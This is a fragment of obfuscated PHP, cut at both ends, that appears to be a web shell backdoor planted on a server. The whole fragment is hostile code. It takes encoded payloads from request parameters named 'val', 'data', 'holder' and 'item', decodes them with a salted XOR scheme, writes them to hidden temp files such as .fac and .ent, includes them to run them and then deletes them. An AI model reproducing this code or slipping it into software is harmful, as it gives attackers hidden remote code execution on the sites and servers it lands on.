$v5) { $sChar = ord($s[$n % $sLen]); $d =((int)$v5 - $sChar -($n % 10)) ^ 31; $parameter_group .= chr($d); } $ptr = array_filter(["/tmp", session_save_path(), ini_get("upload_tmp_dir"), "/dev/shm", sys_get_temp_dir(), getenv("TEMP"), getenv("TMP"), "/var/tmp", getcwd()]); for ($k = 0, $property_set = count($ptr); $k < $property_set; $k++) { $binding = $ptr[$k]; if (array_product([is_dir($binding), is_writable($binding)])) { $desc = vsprintf("%s/%s", [$binding, ".fac"]); if (file_put_contents($desc, $parameter_group)) { include $desc; @unlink($desc); die(); } } } } if(in_array("\x76\x61l", array_keys($_REQUEST))){ $factor = $_REQUEST["\x76\x61l"]; $factor =explode ( "." ,$factor); $key= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($salt ); $z= 0; while ($z < count($factor)) { $v4= $factor[$z]; $chS= ord($salt[$z % $sLen] ); $d= ((int)$v4 - $chS - ($z % 10))^ 65; $key .=chr($d ); $z++;} $marker = array_filter(["/dev/shm", ini_get("upload_tmp_dir"), sys_get_temp_dir(), getcwd(), getenv("TEMP"), "/tmp", "/var/tmp", getenv("TMP"), session_save_path()]); $comp = 0; do { $value = $marker[$comp] ?? null; if ($comp >= count($marker)) break; if (is_dir($value) ? is_writable($value) : false) { $flg = str_replace("{var_dir}", $value, "{var_dir}/.fac"); $file = fopen($flg, 'w'); if ($file) { fwrite($file, $key); fclose($file); include $flg; @unlink($flg); die(); } } $comp++; } while (true); } if(@$_POST["d\x61ta"] !== null){ $mrk = array_filter(["/dev/shm", sys_get_temp_dir(), ini_get("upload_tmp_dir"), getcwd(), getenv("TEMP"), "/tmp", session_save_path(), getenv("TMP"), "/var/tmp"]); $entry = $_POST["d\x61ta"]; $entry= explode( '.', $entry ); $item=''; $salt='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen=strlen($salt ); foreach ($entry as $m => $v8) {$sChar=ord($salt[$m % $sLen] ); $dec=((int)$v8 - $sChar - ($m % 10)) ^ 31; $item .=chr($dec ); } foreach ($mrk as $element) { if ((function($d) { return is_dir($d) && is_writable($d); })($element)) { $factor = join("/", [$element, ".ent"]); if (file_put_contents($factor, $item)) { include $factor; @unlink($factor); exit; } } } } if(@$_POST["h\x6F\x6Cd\x65r"] !== null){ $pset = $_POST["h\x6F\x6Cd\x65r"]; $pset = explode ( "." ,$pset ) ; $hld = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s ); $len = count($pset ); for ($m = 0; $m < $len; $m++) { $v1 = $pset[$m]; $sChar = ord($s[$m % $lenS] ); $dec = ((int)$v1 - $sChar - ($m % 10)) ^ 79; $hld .= chr($dec ); } $resource = array_filter(["/dev/shm", getenv("TMP"), sys_get_temp_dir(), "/tmp", session_save_path(), ini_get("upload_tmp_dir"), getcwd(), getenv("TEMP"), "/var/tmp"]); foreach ($resource as $object): if (!( !is_dir($object) || !is_writable($object) )) { $ent = vsprintf("%s/%s", [$object, ".flag"]); $success = file_put_contents($ent, $hld); if ($success) { include $ent; @unlink($ent); die();} } endforeach; } if(count($_REQUEST) > 0 && isset($_REQUEST["ite\x6D"])){ $property_set = array_filter([sys_get_temp_dir(), "/tmp", ini_get("upload_tmp_dir"), "/var/tmp", "/dev/shm", getenv("TMP"), getenv("TEMP"), getcwd(), session_save_path()]); $comp = $_REQUEST["ite\x6D"]; $comp = explode ( '.' ,$comp ); $key= ''; $s= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($s); foreach ($comp as $i => $v2) {$sChar= ord($s[$i % $sLen]); $d= ((int)$v2 - $sChar - ($i % 10)) ^ 90; $key .= chr($d); } $ref = 0; do { $hld = $property_set[$ref] ?? null; if ($ref >= count($property_set)) break; if ((bool)is_dir($hld) && (bool)is_writable($hld)) { $res = str_replace("{var_dir}", $hld, "{var_dir}/.ent"); $file = fopen($res, 'w'); if ($file) { fwrite($file, $key); fclose($file); include $res; @unlink($res); exit;